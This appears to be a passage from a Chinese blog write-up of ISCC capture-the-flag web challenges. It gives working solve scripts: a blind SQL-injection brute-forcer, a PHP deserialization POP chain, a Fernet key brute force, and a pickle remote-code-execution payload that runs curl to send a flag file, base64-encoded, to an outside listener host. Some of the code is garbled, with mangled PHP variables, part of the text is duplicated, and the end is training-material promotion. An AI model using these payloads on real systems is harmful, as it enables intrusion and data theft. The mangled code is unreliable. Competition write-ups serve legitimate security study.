if len(res.text)<1000:
i-=1
else:
#保存到文件方便查看
f=open(‘./1/’+str(i)+‘.txt’,‘w’)
f.write(res.text)
f.close
2.发现fl4g,尝试该字段
import requests
import string
from time import sleep
# 绕过 are you kidding me
cookies ={
‘csrftoken’:
‘Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31’,
‘sessionid’: “q7kcs19owhq5nf42cln72dckwocgx3kd”,
}
headers = {
‘Acept’:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7’,
‘Accept-Language’ : ‘zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6’,
‘Cache-Control’: ‘max-age=0’,
‘Connection’: ‘keep-alive’,
‘Upgrade-Insecure-Requests’ : ‘1’,
‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36’,
}
def str_to_hex(string):
result = ‘’
for i in string:
result+=hex(ord(i))[2:]
return result
# 正则过滤了,只能 0x+四个字符
url = “http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23”
alphabet=“0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[]^`{|}~”
result= ‘ISCC{’
for i in range(1,100):
for ch in alphabet:
payload = url.format(str_to_hex(result[-1]),str_to_hex(ch))
print(payload)
r = requests.get(url=payload,cookies=cookies,headers=headers)
sleep(1.3)
if “too fast” in r.text:
print(“too fast”)
sleep(2)
r = requests.get(url=payload,cookies=cookies,headers=headers)
if"576O576K576K" in r.text:
print(payload)
result += ch
print(“Success:”, result)
break
爆完即可得到flag
web Where_is_your_love.txt
1.js解码发现3个文件
加密的letter.php,pem公钥,php反序列化
2.构造poc链
读取phpinfo
http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}
发现"love_story::love"无法设置this变量
使用 a = a r r a y ( " s t r i n g " = > [ a = array("string" => [ a=array("string"=>[l, “love”]);
class boy
{
public $like;
public function __destruct()
{
echo "能请你喝杯奶茶吗?
";
@$this->like->make_friends();
}
public function __toString()
{
echo "拱火大法好
";
return $this->like->string;
}
}
class girl
{
private $boyname;
public function __construct($a)
{
$this->boyname = $a;
}
public function __call($func, $args)
{
echo "我害羞羞
";
isset($this->boyname->name);
}
}
class helper
{
private $name; #{“string”:“love_story::love”}
private $string;
public function __construct($a, $string)
{
if ($a === 1) {
$this->name = array(‘string’ => ‘(new love_story())->love’);
var_dump($this->name);
var_dump($this->name[‘string’]);
} else {
$this->name = $a;
}
$this->string = $string;
}
public function __isset($val)
{
echo "僚机上线
";
echo $this->name;
}
public function __get($name)
{
echo "僚机不懈努力
";
$var = t h i s − > this-> this−>name;
var_dump($var);
var_dump( v a r [ var[ var[name]);
v a r [ var[ var[name](); #(new love_story())->love()
}
}
class love_story
{
public $fall_in_love = array(“girl_and_boy”);
public function __construct()
{
echo “construct nihao”;
}
public function love()
{
echo "爱情萌芽
";
array_walk( t h i s , f u n c t i o n ( this, function ( this,function(make, $colo) {
echo "坠入爱河,给你爱的密码
";
if ($make[0] === “girl_and_boy” && $colo === “fall_in_love”) {
global $flag;
echo $flag;
echo “good”;
}
});
}
}
getcwd();
$b1 = new boy();
$b2 = new boy();
h 1 = n e w h e l p e r ( h1 = new helper( h1=newhelper(b2, “222”);
g = n e w g i r l ( g = new girl( g=newgirl(h1);
#$a[“string”] = “love_story::love”;
$l = new love_story();
a = a r r a y ( " s t r i n g " = > [ a = array("string" => [ a=array("string"=>[l, “love”]);
$h2 = new helper(1, $a);
$b2->like = $h2;
$b1->like = $g;
echo urlencode(serialize($b1));
获取到e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404
3.写python解密rsa
从解密网站分解n得到p,q
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.PublicKey import RSA
import codecs
with open(“keyiscc.pem”, “rb”) as f:
key = RSA.import_key(f.read())
print(f"n = {key.n}")
print(f"e = {key.e}")
n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603
e = 65537
p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967
q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709
with open(‘letter.php’, ‘rb’) as f:
c = f.read()
c = int.from_bytes(c, byteorder=‘big’)
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
flag = ‘e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404’
flag1 = ‘’
for i in range(0, len(flag), 2):
cc = int(flag[i:i+2], 16)
b = cc ^ 100
a = chr(b - 10)
flag1 += a
print(codecs.decode(flag1[::-1], ‘rot13’))
解密即可获取flag
web上大号说话.txt
1.输入马保国
发现.git
python反序列化
2.发现cookie加密了
from cryptography.fernet import Fernet
import base64
import threading
def crypto(base_str):
return cipher_suite.encrypt(base_str)
def generate_key(key:str):
key_byte = key.encode()
#print(key_byte)
return base64.urlsafe_b64encode(key_byte + b’0’ * 28)
def decode(t):
try:
print(cipher_suite.decrypt(t))
print(“------------”+all+“-------------------”)
except:
pass
num=0
all=‘’
for i in ‘5’:
for j in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
for k in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
for z in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
all=i+j+k+z
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")
解密为5MbG
3.发现没有回显
使用公网ip监听
curl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64
尝试R指令被过滤
4.指令构造
b’\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64\nb.’
from cryptography.fernet import Fernet
import base64
import threading
def crypto(base_str):
return cipher_suite.encrypt(base_str)
def generate_key(key:str):
key_byte = key.encode()
#print(key_byte)
return base64.urlsafe_b64encode(key_byte + b’0’ * 28)
def decode(t):
try:
print(cipher_suite.decrypt(t))
print(“------------”+all+“-------------------”)
exit()
except:
pass
num=0
all=‘’
#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
all=“5MbG”
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
print(crypto( b’\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64\nb.'))
#decode(b"gAAAAABkbgX5ULO_yPmzK5cLusRWO9eeWW-5-MruKo3SMn29dxd4ymBY0IAt-3KJcHnYI5k7ZYIP9p8O59NoQf_o0pK8Zp-zJe5_h0-eNl86g8hsUmZakXP5d0u9QmwiViRQe8e0F_ORzxOoXnHPA4qlVySkCfeYcQCAUs8fXQZyRA6mwWgJklQ=")
加密gAAAAABkbgc2jXRhMnhB6ByRTx_31_oUchMP2wbrwyiLncydkyz8sycBHyPOY4zUlDJMdg0GLiwdh49tDzieZFl8GY01nZrLcnqAVf3_oAM2a8qBvjTFtb81xZsN9ZxJV5M3OcH1v78ItP4Alxg-VX74Py9kSLAtVtXmc87RX4dlLsNulmwiat1r5e3VoNfY9-jXcb1zruJfqyFs1ZE1KtWGW8JcTgLeww==
即可监听到base64编码的flag
web小周的密码锁.txt
1.password2=5查看源码
2.写个py脚本碰撞sha1值
from hashlib import sha1
num=0
for s1 in ’ #"%$&)(+*-,/.1234567890’:
for s2 in ’ #"%$&)(+*-,/.1234567890’:
for s3 in ’ #"%$&)(+*-,/.1234567890’:
for s4 in ’ #"%$&)(+*-,/.1234567890’:
for s5 in ’ #"%$&)(+*-,/.1234567890’:
for s6 in ’ #"%$&)(+*-,/.1234567890’:
x=s1+s2+s3+s4+s5+s6
num+=1
if sha1(x.encode()).hexdigest()[-6:] == ‘a05c53’:
print(x)
if num%100000==0:
print(num)
#反向解析
from hashlib import sha1
num=0
for sha11 in ‘abcdefghijklmnopqrstuvwsyz’:
for sha2 in ‘ABCDEFGHIJKLMNOPQRSTUVWSYZ’:
sha=chr(ord(sha11)^ord(sha2));
if sha in ’ (81&-':
print(sha11,sha2,sha)
最后找到aaaaaa和AIYPGL符合条件
3.写个php脚本绕过myhash
<?php
function MyHashCode($str)
{
$h = 0;
l e n = s t r l e n ( len = strlen( len=strlen(str);
for ($i = 0; $i < $len; $i++) {
$hash = intval40(intval40(40 * h a s h ) + o r d ( hash) + ord( hash)+ord(str[$i]));
}
return abs($hash);
}
function intval40($code)
{
$falg = $code >> 32;
if ($falg == 1) {
c o d e = ( code = ~( code= (code - 1);
return $code * -1;
} else {
return $code;
}
}
$a=“abcdefghijklmnopqrstuvwxyz”;
echo MyHashCode(“ISCCNOTHARD”);
for( i ; i; i;i<strlen( a ) ; a); a);i++) {
echo “
”;
echo MyHashCode(“IS”. a [ a[ a[i].“CNOTHARD”);
if(MyHashCode(“IR”. a [ a[ a[i].“CNOTHARD”)===MyHashCode(“ISCCNOTHARD”)){
echo “IR”. a [ a[ a[i].“CNOTHARD”;
}
}
求出IRkCNOTHARD符合条件
//其中有个变量含有unicode控制字符,反向显示,原样复制下来就能用
构造payload
/?password=1&%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=AIYPGL&sha1=aaaaaa&username=A40481&password=IRkCNOTHARD
web羊了个羊.txt
1.vue.global.js中找max
2.发现maxLevel为最大关卡
3.修改maxLevel为2即可拿到flag
##或者直接搜索alert
发现base64,解码
web老狼老狼几点了.txt
1.burpsuite简单的跑一下time=0-60
2.发现time=12时显示源代码
3.思路是利用include()包含伪协议获取flag.php
4.发现filter对序列化后的内容进行过滤,接着又反序列化,这会破坏序列化字串的结构
构造内容_SESSION[base64base64]=000";s:1:“1”;s:8:“function”;s:4:“hack”;s:4:“file”;s:58:“php://filter/read=convert.babase64se64-encode/resource=index.php”;}
序列化后:a:3:{s:12:“base64base64”;s:123:“000”;s:1:“1”;s:8:“function”;s:4:“hack”;s:4:“file”;s:58:“php://filter/read=convert.babase64se64-encode/resource=index.php”;}";s:4:“file”;s:8:“time.php”;s:8:“function”;s:9:“show_time”;}
过滤后:a:3:{s:12:“”;s:123:“000”;s:1:“1”;s:8:“function”;s:4:“hack”;s:4:“file”;s:58:“php://filter/read=convert.base64-encode/resource=index.php”;}";s:4:“file”;s:8:“time.php”;s:8:“function”;s:9:“show_time”;}
这就拼接成一个新的序列化内容
5.最后md5碰撞,并提交上述内容
import requests
import time
s = requests.session()
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
:58:“php://filter/read=convert.babase64se64-encode/resource=index.php”;}
序列化后:a:3:{s:12:“base64base64”;s:123:“000”;s:1:“1”;s:8:“function”;s:4:“hack”;s:4:“file”;s:58:“php://filter/read=convert.babase64se64-encode/resource=index.php”;}";s:4:“file”;s:8:“time.php”;s:8:“function”;s:9:“show_time”;}
过滤后:a:3:{s:12:“”;s:123:“000”;s:1:“1”;s:8:“function”;s:4:“hack”;s:4:“file”;s:58:“php://filter/read=convert.base64-encode/resource=index.php”;}";s:4:“file”;s:8:“time.php”;s:8:“function”;s:9:“show_time”;}
这就拼接成一个新的序列化内容
5.最后md5碰撞,并提交上述内容
import requests
import time
s = requests.session()
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
[外链图片转存中…(img-iBaIAWPS-1715881060822)]
[外链图片转存中…(img-6eDS4ULv-1715881060822)]
[外链图片转存中…(img-v1oocE2c-1715881060823)]
[外链图片转存中…(img-5fT8CjrV-1715881060823)]
[外链图片转存中…(img-80UFfH15-1715881060823)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
扫一扫
1191
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
